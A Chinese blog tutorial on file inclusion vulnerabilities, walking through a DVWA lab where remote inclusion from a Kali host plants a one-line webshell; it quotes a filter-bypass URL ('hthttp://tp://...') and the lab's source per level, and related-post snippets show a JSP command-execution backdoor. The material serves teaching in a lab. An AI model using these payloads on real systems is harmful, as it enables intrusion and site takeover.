Web安全-文件包含漏洞

最新推荐文章于 2024-02-23 10:40:24 发布
最新推荐文章于 2024-02-23 10:40:24 发布
阅读量1.4k 收藏 14
点赞数
分类专栏: Web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39190897/article/details/86765826
版权

概述

在这里插入图片描述

PHP文件包含

本地/远程包含

(1)本地包含
在这里插入图片描述在这里插入图片描述
(2)远程包含
在这里插入图片描述

远程包含与本地包含没有区别,无论是哪种扩展名,只要遵循PHP语法规范,PHP解析器就会对其解析。

文件包含检测

在这里插入图片描述

文件包含Shell

如果某个页面确实存在文件包含漏洞后,攻击者是如何利用包含漏洞来攻击Web应用程序的呢?下面将剖析几种常见的攻击方式。
在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述

JSP文件包含

JSP包含分为两种:静态包含和动态包含。下面详细介绍这两种包含操作。

静态包含

在这里插入图片描述

动态包含

在这里插入图片描述

漏洞的修复

在这里插入图片描述
【更多文件包含漏洞的学习】:https://www.freebuf.com/articles/web/182280.html

DVWA靶场

下面将在VMware中使用Win 7虚拟机搭建DVWA靶场,进行文件包含漏洞的实战演示:
在这里插入图片描述Win 10 物理机中可访问靶场:
在这里插入图片描述以下靶场攻击的演示过程将包括 本地文件包含、远程文件包含、如何利用图片木马(或其他文件如.txt)包含生成Shell 等完整的文件包含漏洞利用方式。

LOW

靶场页面如下:
在这里插入图片描述
先看LOW级别下low.php源代码:
在这里插入图片描述
可以看到,low级别的代码对包含的文件没有进行任何的过滤!这导致我们可以进行包含任意的文件。

下面验证下文件包含漏洞并简单利用:

1、当我们包含一个不存在的文件 123.php ,可以看到发生了报错,并且把网站的路径都给暴露出来了:

在这里插入图片描述2、点击包含靶场提供的文件包含漏洞测试文件file1.php,可以执行PHP脚本并查看Win 10物理机的本地IP地址:
在这里插入图片描述
3、可以在靶场网站后台查看file1.php文件的源码:
在这里插入图片描述4、接下来试着用file协议包含Win 7虚拟机本地的123.txt文件试试:
在这里插入图片描述
将成功回显文件内容:
在这里插入图片描述5、最后,将123.txt文件内容换为php脚本<?php phpinfo(); ?>,可成功包含并执行脚本:
在这里插入图片描述
接着,咱们试一下 远程文件包含 并在网站路径下生成一句话木马,最终尝试使用菜刀连接木马获得网站的控制权。

1、首先在 Kali 虚拟机中开启Apache服务:
在这里插入图片描述
2、Win 10虚拟机访问试试:
在这里插入图片描述3、在Kali虚拟机的 Apache 网站服务器的根目录下创建 hack.txt文件:
在这里插入图片描述
4、Win 10物理机访问Kali虚拟机上的远程文件,可成功访问:
在这里插入图片描述
5、接下来,使用DVWA靶场包含该远程文件:
在这里插入图片描述6、以上没有任何回显,但是此时在 Win 7 靶机的 DVWA网站的文件包含漏洞的路径下已经自动生成了一句话木马文件muma.php
在这里插入图片描述7、Win 10中使用浏览器访问该文件试试:
在这里插入图片描述8、最后,上菜刀连接木马:
在这里插入图片描述
已获得 Win 7 靶机的网站控制权:
在这里插入图片描述
最后关于本地文件包含获得Shell,我们还可以利用DVWA靶场中文件上传漏洞上传图片木马(所包含的脚本语句同上),然后利用文件包含漏洞访问木片木马,最终生成一句话木马并获得Shell,攻击过程与上述类似,此处不再复述。

有兴趣可参见另一篇博文:Web安全-文件上传漏洞,里头在DVWA靶场文件上传漏洞的High级别便是利用图片木马+文件包含漏洞获得Shell。

Medium

老规矩,先查看后台源码:

<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\"" ), "", $file );
?>

可以看到,代码使用 str_replace函数对http://https://关键字进行了过滤,防止了远程包含漏洞的产生,同时也过滤了 ../..\ 防止了进行目录切换的本地文件包含。

但是使用 str_replace 函数进行过滤是很不安全的,因为可以使用双写绕过。例如,我们包含 hthttp://tp://IP地址 时,str_replace 函数只会过滤一个 http://,所以最终还是会包含到 http:// 。

所以,我们可以试试访问该链接 http://10.27.25.238:8088/DVWA/vulnerabilities/fi/?=hthttp://tp://10.27.24.101/hack.txt,结果依然可以成功包含了远端的文件,所以我们就可以用一句话木马连接了。过程同上,此处不再演示。

High

先上源代码:

<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}
?>

High级别的代码对包含的文件名进行了限制,必须为 file* 或者 include.php ,否则会提示报错 Error:File not found。

这个简单,还留下后路了,直接结合文件上传漏洞上传图片木马,然后使用file:///协议包含图片木马,生成一句话木马文件即可。可参见另一篇博文:Web安全-文件上传漏洞,里头在DVWA靶场文件上传漏洞的High级别便是利用图片木马+文件包含漏洞获得Shell。

Impossible

源代码:

<?php
// The page we wish to display
$file = $_GET[ 'page' ];
 
// Only allow include.php or file{1..3}.php
if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}
?>

可以看到,impossible级别的代码使用了白名单过滤的方法,包含的文件名只能等于白名单中的文件,所以避免了文件包含漏洞的产生!

Tr0e
关注
  • 0
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
web渗透--42--本地文件包含/远程文件包含
武天旭的博客
09-21 2081
一、本地文件包含 1、漏洞描述 本地文件包含(也称为LFI)是利用应用程序中存在有漏洞的包含程序,来完成包含文件的过程。例如,当页面接把包含文件的路径作为输入,但未经过适当的过滤,允许在输入中插入目录遍历字符(…/)时,就容易出现这个漏洞。这个漏洞常出现在PHP、ASP、JSP等其他技术中。 2、测试方法 当传递到include语句的路径未经过适当的过滤时,便会出现LFI漏洞,因此,测试时应该把文件名作为参数的脚本。
一句话木马拿Shell与菜刀原理
悦分享
07-12 1384
1. 直接上传asp asa jsp cer php aspx htr cdx 格式的木马,不行就加个空格或是利用IIS6.0解析漏洞,常见格式:1.asp;1.jpg 或 1.asp;.jpg 或 1.asp;jpg2. 有时上传图片格式的木马,居然被程序检测拦截了,右键记事本打开木马,在代码最前面加上gif89a,再数据库备份备份成asp格式的木马拿下shell。3. 上传图片格式木马,复制地址到数据库备份备份成asp格式木马,有时不成功的话,就利用IIs6.0解析漏洞,格式:1.asp;
JSP页面包含文件的两种方法及其区别:include指令标识 & 动态标识
weixin_44270855的博客
03-17 3392
JSP页面中包含文件的方法有两种:一种是应用<%@ include %>指令实现;另一种是应用\<jsp:include>动作元素实现。 (一)<%@ include %>指令 通过该指令可以在一个JSP页面中包含另一个JSP页面。但该指令是静态包含,也就是说被包含文件中所有的内容会被原样包含到该JSP页面中,即使被包含文件中有JSP代码,在包含时也不会被编译...
web安全主要包括哪些方面的安全
最新发布
wholeliubei的博客
02-23 1197
如果你也想学习:黑客&网络安全的SQL攻防web安全主要包括哪些方面的安全web安全主要分为保护服务器及其数据的安全、保护服务器和用户之间传递的信息的安全、保护web应用客户端及其环境安全这三个方面。web安全介绍Web应用安全问题本质上源于软件质量问题。但Web应用相较传统的软件,具有其独特性。Web应用往往是某个机构所独有的应用,对其存在的漏洞,已知的通用漏洞签名缺乏有效性;需要频繁地变更以满足业务目标,从而使得很难维持有序的开发周期;
文件操作之文件包含全解(31)
san3144393495的博客
06-01 936
文件包含的作用就是将这个文件包含进去之后,会调用指定文件的代码。先将文件包含才能执行里面的一些相关代码,比如所想进行文件的链接,数据库的查询,就可以先包含一个数据库的配置文件, 再去链接的话就享有配置文件的一些配置信息,就不需要在进行相关的操作。它可以把一些功能性代码写到一个文件里面,然后用另外一个文件去包含这个文件,这样子就不再重复书写那个包含文件里面的代码。==#include file=”top.aspx”--> 这个aspx运行,包含了一个top.aspx文件。> php的写法。
【应急响应】————8、菜刀链接+木马
Fly_鹏程万里
02-22 307
0x01 排查过程 11:10看到主机监控告警,告警内容为 cd "/usr/local/web/cdksw/general-tomcat-6.0.18/webapps/background/background/upload/";ver;echo [S];pwd;echo [E] 看内容就是菜刀马执行,看目录发现是upload可以猜测是文件上传的问题。受影响的是两台负载的机器,其中一台报...
jsp小后门
Jiajia2017的博客
12-18 1038
转自  http://zone.wooyun.org/content/17356  园长 一:执行系统命令:无回显执行系统命令:<%Runtime.getRuntime().exec(request.getParameter("i"));%>请求:http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls执行之后不会有任何回显,...
菜刀和一句话木马
weixin_44720762的博客
05-02 3757
中国菜刀,一个非常好用而又强大的webshell webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。 在博主本人看来,对于一名网安小白来说,这段解释对理解webshell没有丝毫帮助。webshell:web:网站 shell:命令语言。执行用户输入的命令或者说执行预先设定好的一连串的命令 也就是一种具有命令效果的网页代码,...
第31天:WEB漏洞-文件操作之文件包含漏洞全解
MCTSOG的博客
03-16 1739
文件包含漏洞 0x00 文件包含 程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需再次编写,这中文件调用的过程一般被称为文件包含。 0x01 文件包含漏洞的成因 程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用, 但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。 几乎所有脚本语言都会提供文件包含的功能。 在PHP中经常出现包含漏洞,但这并不意味这其他语言不存在。 0x02 文件包含漏洞的分类 本地文件包含.
web-渗透-文件上传漏洞专题靶场.rar
03-14
本靶场为二十一个关于文件上传漏洞的环境,从前端绕过、服务器绕过、木马图上传绕过、截断绕过、竞争条件等等几乎包含目前所有的文件上传漏洞类型,刷完即掌握文件上传漏洞的所有要点。 文件中打包了所需的所有环境...
Web应用安全文件包含漏洞简介.pptx
06-18
大多数Web语言都支持文件包含操作,其中PHP语言所提供的文件包含功能太强大、太灵活,也就导致文件包含漏洞经常出现在PHP语言中。这里就以PHP语言为例。 PHP中提供了四个文件包含的函数: include( ) 当使用该函数...
web网站文件包含漏洞和攻击-运维安全详细笔记总结
06-30
web网站文件包含漏洞和攻击-运维安全详细笔记总结
第七式 七伤拳 web安全文件包含漏洞专题.pdf
06-22
tsrc线上培训资料 第七式 七伤拳 web安全文件包含漏洞专题
web安全-dvwa实战手
07-05
文件包含:说明文件包含漏洞是如何允许攻击者包含或执行系统中的文件,从而可能引发未授权访问或恶意代码执行的情况。 4。文件上传:介绍文件上传漏洞是如何允许攻击者上传恶意文件到目标服务器,并探讨可能导致的...
文件包含漏洞
weixin_46273733的博客
01-15 727
文件包含漏洞 PHP包含 PHP中提供了四个文件包含的函数,分别是 include()、include once()、require()和require_once()。这四个函数都可以进行文件包含,但作用却不一样,其区别如下: 文件包含示例 本地包含 Local File Include (LFI) Index.php对ArrayUtil.php进行包含,并且使用PrintArr 函数 phpinfo.txt文件
(31)【文件包含漏洞】简介、原理、危害、分类、函数、伪协议、利用过程……
04-10 3570
web-文件包含漏洞
jsp文件包含漏洞
weixin_30549175的博客
07-24 452
jsp文件包含分静态包含的动态包含两种: 静态包含:<%@include file="top.jsp"%> 动态包含:<jsp:include page="top.jsp" /> 两者的区别我就不赘述了。 就目前了解静态包含是不存在问题的,因为file的参数不能动态赋值 而动态包含是存在问题的 我们常说的php文件包含有本地文件包含远程文件包含两种 所以我...
什么是jsp
liujiujiang的博客
08-07 431
什么是JSP? JSP全称Java Server Pages,是一种动态网页开发技术。它使用JSP标签在HTML网页中插入Java代码。标签通常以&lt;%开头以%&gt;结束。 JSP是一种Java servlet,主要用于实现Java web应用程序的用户界面部分。网页开发者们通过结合HTML代码、XHTML代码、XML元素以及嵌入JSP操作和命令来编写JSPJSP通过网页表单获取用...
Web安全漏洞包括文件包含漏洞吗?
05-13
是的,文件包含漏洞Web安全漏洞的一种类型。文件包含漏洞通常发生在Web应用程序中,当应用程序使用用户提供的数据(如文件名或路径)来加载或执行文件时,攻击者可以通过构造恶意输入来实现远程代码执行或敏感信息泄露等攻击。因此,应用程序应该仔细验证和过滤用户提供的数据,并采取适当的防御措施来防止文件包含漏洞

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Tr0e

分享不易,望多鼓励~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值